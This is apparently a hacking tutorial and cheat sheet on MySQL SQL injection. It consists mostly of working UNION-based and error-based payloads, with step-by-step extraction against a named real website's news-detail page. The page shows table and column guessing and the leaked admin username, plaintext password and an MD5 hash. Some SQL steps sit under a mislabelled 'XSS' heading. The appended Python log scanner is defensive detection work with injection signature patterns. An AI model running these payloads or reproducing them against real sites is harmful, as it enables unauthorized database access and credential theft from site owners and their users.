id=-53 UNION SELECT 1,2,3,4,5, lcase(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, ucase(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, min(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, max(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, count(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, concat(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() limit 9,1--
id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
id=null UNION SELECT 1,2,3,4,5,6,7,8-- -
Null UNION SELECT
======================XSS========================
Step 1
Find the number of columns, for example 6.
Step 2
1,2,3,4,5, unhex(hex(group_concat(table_name,0x2f))) ,7,8,9,10,11,12,13,14,15 from information_schema.tables--
This shows the tables: tt_emori_admin/,tt_emori_en_admin/,tbl_user/
Step 3
1,2,3,4,5, unhex(hex(group_concat(column_name,0x2f))) ,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name in (0x74626c5f75736572)--
Here 74626c5f75736572 is the hex encoding of tbl_user.
It prints out id/,uid/,pwd/
Step 4
1,2,3,4,5, group_concat(uid,0x2f,pwd) ,7,8,9,10,11,12,13,14,15 from tbl_user--
The login username and password come out as: admin/21232f297a57a5a743894a0e4a801fc3
==SQL INJECTION==
Injecting site with 4 Columns
SQL INJECTION WHERE THE VERSION IS LESS THAN 5
Hello, all! Today I'm going to teach you how to inject a website whose MySQL version is less than 5. Special thanks to my dearest Luge Racer Bro.
Let's start. As an example, I'm taking this site.
http://www.ultimatehomedesign.com/news-detail.php?id=312
NOTE: Don't step ahead if you don't know UNION-based SQL injection.
Getting Version
Now, let's check the version with an error-based query.
+or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1--
Version : Duplicate entry '4.1.22-standard~1' for key 1
Getting Tables
This site doesn't have information_schema, because the version is less than 5 (information_schema was introduced in MySQL 5.0). We have to guess the table names.
This should be our syntax to guess the tables.
or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Now we have to guess the table name with this syntax. Some tables that usually contain login data:
admin, adminstator, tbl_admin, tbl_adminstator, login, member, user, users, table_users, settings
Now I'm trying to guess the table name with the syntax.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
I tried to guess the admin table. There is no table in the database named admin.
So this error came up:
Table 'uhd.admin' doesn't exist
Let's try to guess another table.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Again an error came up. There is no table in the database named adminstator.
So this error came up:
Table 'uhd.adminstator' doesn't exist
Let's try another table:
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
So the users table exists. No "doesn't exist" error came up; instead the query returns the expected duplicate-entry error:
Duplicate entry '1~1' for key 1
Getting Columns
Now, we have to guess the column name. So the syntax to get columns should be like this:
+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Username is the most common column name. Let's try it.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
An error came up. The column doesn't exist:
Unknown column 'username' in 'field list'
Let's try to guess another column: user_name.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Now the site loads fine. That means user_name exists.
Now try to guess the password column. Let's try user_pass.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Extracting data from columns
To get data from the columns, our syntax should be this:
or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Sometimes this query doesn't work, as it doesn't on this site. We have to use substring.
Getting Username:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
With this subquery we can build a more complex query. It retrieves a value from a table column in pieces: the substring function returns the leading characters of the query's result (here substring(user_name,1,25) takes the first 25 characters), which are then leaked through the duplicate-entry error.
The username comes up in the error:
Duplicate entry 'root~1' for key 1
Getting Password:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
Password came up :
Duplicate entry 'trump123~1' for key 1
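A defender-side check, added here as an example and not part of the original write-up, covering both the UNION-based steps (Steps 1 to 4 above) and the error-based technique in this section: it decodes request URLs from constructed access-log lines and flags the payload styles the page shows (UNION SELECT against information_schema, and the group by / floor(rand(0)*2) / having form), and a helper spots the verbose MySQL error strings quoted above when they reach a response body. The log lines and signature names are my own assumptions, not from any real server.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the two injection styles on this page: UNION-based
# enumeration of information_schema, and the error-based
# "group by ... floor(rand(0)*2) ... having" trick that leaks data
# through MySQL's "Duplicate entry" error.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "error_based_rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by_having": re.compile(
        r"\bgroup\s+by\b[\s\S]{0,200}?\bhaving\b", re.I),
}

# MySQL error fragments quoted on this page; seeing them in a response
# body means raw database errors are being shown to clients.
ERROR_LEAKS = ("Duplicate entry", "doesn't exist", "Unknown column")


def decode_query(url: str) -> str:
    """Return the URL-decoded query string of a request path ('' if none)."""
    _, _, query = url.partition("?")
    return unquote_plus(query)


def classify_request(url: str) -> list[str]:
    """Names of the injection signatures matched by one request path."""
    q = decode_query(url)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def leaks_db_error(body: str) -> bool:
    """True if a response body contains a verbose MySQL error fragment."""
    return any(marker in body for marker in ERROR_LEAKS)


# Constructed sample log lines ("METHOD PATH STATUS"), not real traffic.
SAMPLE_LOG = [
    "GET /news-detail.php?id=312 200",
    "GET /news-detail.php?id=-53+UNION+SELECT+1,2,3,4,5,lcase(table_name),7"
    "+from+information_schema.tables+where+table_schema=database()-- 200",
    "GET /news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,version(),"
    "floor(rand(0)*2))+having+min(0)+or+1-- 500",
    "GET /news-detail.php?id=5 200",
]


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (path, matched signatures) for each suspicious log line."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        matched = classify_request(parts[1])
        if matched:
            hits.append((parts[1], matched))
    return hits
```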